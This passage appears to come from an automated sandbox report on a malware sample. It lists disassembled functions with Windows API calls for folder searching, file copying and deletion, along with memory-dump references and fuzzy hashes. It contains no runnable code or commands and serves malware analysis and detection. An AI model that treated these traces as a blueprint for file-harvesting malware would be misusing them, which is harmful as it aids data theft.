                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID: UaA
                                                        • API String ID: 2104210347-3893042857
                                                        • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                        • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                        • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                        • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                        Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SystemTimelstrcpy
                                                        • String ID: cI@$cI@
                                                        • API String ID: 62757014-1697673767
                                                        • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                        • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                        • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                        • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                        Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                        • lstrcatA.KERNEL32(?,0082B2F0), ref: 004150A8
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                        • String ID: aA
                                                        • API String ID: 2699682494-2567749500
                                                        • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                        • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                        • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                        • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                        Function 00B2BCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2BF06
                                                          • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                        • StrStrA.SHLWAPI(00000000,004213E0), ref: 00B2BF34
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2C00C
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2C020
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                        • String ID:
                                                        • API String ID: 1440504306-0
                                                        • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                        • Instruction ID: c268e11c0ebc0aa9c18c9fda7a4d8380410d0f9f41d3d1bf079d4a102e6748b1
                                                        • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                        • Instruction Fuzzy Hash: 7AB16372910218ABCB14FBA0DD96EEE77B9AF15301F705199F446620A1EF346F48CF62
                                                        Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                        • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                        • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                        • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFileNextlstrcat
                                                        • String ID: !=A
                                                        • API String ID: 3840410801-2919091325
                                                        • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                        • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                        • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                        • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                        Function 00B351A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B351E1
                                                        • lstrcat.KERNEL32(?,00421070), ref: 00B351FE
                                                        • lstrcat.KERNEL32(?,0064A5F8), ref: 00B35212
                                                        • lstrcat.KERNEL32(?,00421074), ref: 00B35224
                                                          • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34B93
                                                          • Part of subcall function 00B34B77: FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                          • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                          • Part of subcall function 00B34B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                          • Part of subcall function 00B34B77: FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                        • String ID:
                                                        • API String ID: 2667927680-0
                                                        • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                        • Instruction ID: d79962a528f697bc759fb9fa8093bf7bda692bbfafcaac03161388312a52c6d0
                                                        • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                        • Instruction Fuzzy Hash: 9B21DD7AA402147BC714FBF0EC46EE973BDAB55300F4045C8768992191EE749AC9CF92
                                                        Function 00B394C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpynlstrlenwsprintf
                                                        • String ID:
                                                        • API String ID: 1206339513-0
                                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction ID: 69d18565d389b8bb58a82cb6ecb2cd40c66ee4284a7c45517a8fa544f3a4b8cf
                                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction Fuzzy Hash: 20011E79540108FFCB04DFECD984EAE7BBAEF45354F108148F9098B300C631AA40DB91